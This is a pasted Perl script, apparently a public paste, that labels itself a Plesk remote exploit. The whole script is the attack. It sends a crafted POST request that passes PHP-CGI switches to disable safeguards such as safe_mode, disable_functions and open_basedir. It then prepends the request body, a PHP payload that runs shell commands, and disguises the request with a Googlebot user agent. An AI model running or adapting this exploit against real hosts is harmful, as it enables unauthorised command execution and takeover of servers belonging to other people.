SHOW:
|
|
- or go back to the newest paste.
| 1 | #plesk remote exploit by kingcope | |
| 2 | #all your base belongs to me :> | |
| 3 | use strict; | |
| 4 | use warnings; | |
| 5 | use IO::Socket; | |
| 6 | use URI::Escape; | |
| 7 | main {
| |
| 8 | my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], | |
| 9 | PeerPort => 80, | |
| 10 | Proto => 'tcp') or die "OH GOD HOW DID THIS GET HERE I AM NOT GOOD WITH SOCKETS"; | |
| 11 | my $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
| |
| 12 | my $arguments = uri_escape("-d","\0-\377"). "+" .
| |
| 13 | uri_escape("allow_url_include=on","\0-\377"). "+" .
| |
| 14 | uri_escape("-d","\0-\377"). "+" .
| |
| 15 | uri_escape("safe_mode=off","\0-\377"). "+" .
| |
| 16 | uri_escape("-d","\0-\377"). "+" .
| |
| 17 | uri_escape("suhosin.simulation=on","\0-\377"). "+" .
| |
| 18 | uri_escape("-d","\0-\377"). "+" .
| |
| 19 | uri_escape("disable_functions=\"\"","\0-\377"). "+" .
| |
| 20 | uri_escape("-d","\0-\377"). "+" .
| |
| 21 | uri_escape("open_basedir=none","\0-\377"). "+" .
| |
| 22 | uri_escape("-d","\0-\377"). "+" .
| |
| 23 | uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
| |
| 24 | uri_escape("-n","\0-\377");
| |
| 25 | my $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
| |
| 26 | print $sock "POST /$path?$arguments HTTP/1.1\r\n" | |
| 27 | ."Host: $ARGV[0]\r\n" | |
| 28 | ."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n" | |
| 29 | ."Content-Type: application/x-www-form-urlencoded\r\n" | |
| 30 | ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn; | |
| 31 | while(<$sock>) {
| |
| 32 | print; | |
| 33 | } | |
| 34 | } | |
| 35 | &main(); |
